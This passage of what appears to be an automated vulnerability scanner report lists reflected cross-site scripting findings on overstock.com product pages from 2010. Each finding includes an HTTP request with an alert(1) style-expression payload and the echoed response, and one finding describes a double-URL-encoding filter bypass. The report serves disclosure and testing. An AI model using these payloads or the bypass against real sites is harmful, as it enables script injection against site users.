Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:30 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:30 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=4342765|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:30 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408310216:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:30 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113612

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Sa
...[SNIP]...
<input type="hidden" name="ea2c2"style="x:expression(alert(1))"84955bdb5b4" value="1"/>
...[SNIP]...

2.102. http://www.overstock.com/Electronics/Textured-Silicone-Skin-Case-for-Apple-iPhone/3889200/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/Textured-Silicone-Skin-Case-for-Apple-iPhone/3889200/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff07e"style%3d"x%3aexpression(alert(1))"6838bc39a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff07e"style="x:expression(alert(1))"6838bc39a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Electronics/Textured-Silicone-Skin-Case-for-Apple-iPhone/3889200/product.html?ff07e"style%3d"x%3aexpression(alert(1))"6838bc39a=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:21 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:21 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:21 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3889200|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:21 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408301902:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113423

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>Te
...[SNIP]...
<input type="hidden" name="ff07e"style="x:expression(alert(1))"6838bc39a" value="1"/>
...[SNIP]...

2.103. http://www.overstock.com/Electronics/TomTom-ONE-140S-GPS-Navigation-System-with-Bonus-Kit-New-in-Non-Retail-Packaging/4714183/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Electronics/TomTom-ONE-140S-GPS-Navigation-System-with-Bonus-Kit-New-in-Non-Retail-Packaging/4714183/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 134ae"style%3d"x%3aexpression(alert(1))"050d7f052a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 134ae"style="x:expression(alert(1))"050d7f052a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Electronics/TomTom-ONE-140S-GPS-Navigation-System-with-Bonus-Kit-New-in-Non-Retail-Packaging/4714183/product.html?134ae"style%3d"x%3aexpression(alert(1))"050d7f052a0=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:21 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:21 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:21 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4714183|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:21 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408301591:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=4
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111398

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>To
...[SNIP]...
<input type="hidden" name="134ae"style="x:expression(alert(1))"050d7f052a0" value="1"/>
...[SNIP]...

2.104. http://www.overstock.com/Eziba/Cozumel-Chaise/4893252/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Eziba/Cozumel-Chaise/4893252/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50a5c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e0c993399bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 50a5c"style="x:expression(alert(1))"e0c993399bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Eziba/Cozumel-Chaise/4893252/product.html?50a5c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e0c993399bf=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:50:18 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:50:18 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404218406:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4893252|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:50:18 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:50:18 GMT; Path=/
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 103622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Co
...[SNIP]...
<input type="hidden" name="50a5c"style="x:expression(alert(1))"e0c993399bf" value="1"/>
...[SNIP]...

2.105. http://www.overstock.com/Gifts-Flowers/Armarkat-Cozy-20-inch-Mocha-and-Beige-Pet-Bed/4413829/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Armarkat-Cozy-20-inch-Mocha-and-Beige-Pet-Bed/4413829/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ce38"style%3d"x%3aexpression(alert(1))"74566734d36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ce38"style="x:expression(alert(1))"74566734d36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Armarkat-Cozy-20-inch-Mocha-and-Beige-Pet-Bed/4413829/product.html?3ce38"style%3d"x%3aexpression(alert(1))"74566734d36=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:08:10 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:08:10 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4413829|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:08:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408890347:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:08:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=58
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108056

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Ar
...[SNIP]...
<input type="hidden" name="3ce38"style="x:expression(alert(1))"74566734d36" value="1"/>
...[SNIP]...

2.106. http://www.overstock.com/Gifts-Flowers/Armarkat-Slipper-shaped-Mocha-Pet-Bed/4415728/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Armarkat-Slipper-shaped-Mocha-Pet-Bed/4415728/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f94e1"style%3d"x%3aexpression(alert(1))"8825e2ad130 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f94e1"style="x:expression(alert(1))"8825e2ad130 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Armarkat-Slipper-shaped-Mocha-Pet-Bed/4415728/product.html?f94e1"style%3d"x%3aexpression(alert(1))"8825e2ad130=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:07:52 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:07:52 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408872824:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4415728|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:52 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:52 GMT; Path=/
Keep-Alive: timeout=5, max=25
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110648

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Ar
...[SNIP]...
<input type="hidden" name="f94e1"style="x:expression(alert(1))"8825e2ad130" value="1"/>
...[SNIP]...

2.107. http://www.overstock.com/Gifts-Flowers/Cat-Tree-Condo-House-Scratcher-72-inch-Furniture/5098578/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Cat-Tree-Condo-House-Scratcher-72-inch-Furniture/5098578/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da40d"style%3d"x%3aexpression(alert(1))"40d931848fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da40d"style="x:expression(alert(1))"40d931848fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Cat-Tree-Condo-House-Scratcher-72-inch-Furniture/5098578/product.html?da40d"style%3d"x%3aexpression(alert(1))"40d931848fb=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:07:56 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:07:56 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:56 GMT; Path=/
Set-Cookie: mxcproclicks=5098578|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:07:56 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408876091:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110982

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Ca
...[SNIP]...
<input type="hidden" name="da40d"style="x:expression(alert(1))"40d931848fb" value="1"/>
...[SNIP]...

2.108. http://www.overstock.com/Gifts-Flowers/Extra-Large-Lounger-Dog-Pet-Bed/2684796/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Gifts-Flowers/Extra-Large-Lounger-Dog-Pet-Bed/2684796/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de180"style%3d"x%3aexpression(alert(1))"452ca6d83aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de180"style="x:expression(alert(1))"452ca6d83aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Gifts-Flowers/Extra-Large-Lounger-Dog-Pet-Bed/2684796/product.html?de180"style%3d"x%3aexpression(alert(1))"452ca6d83aa=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:08:07 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:08:07 GMT
Pragma: no-cache
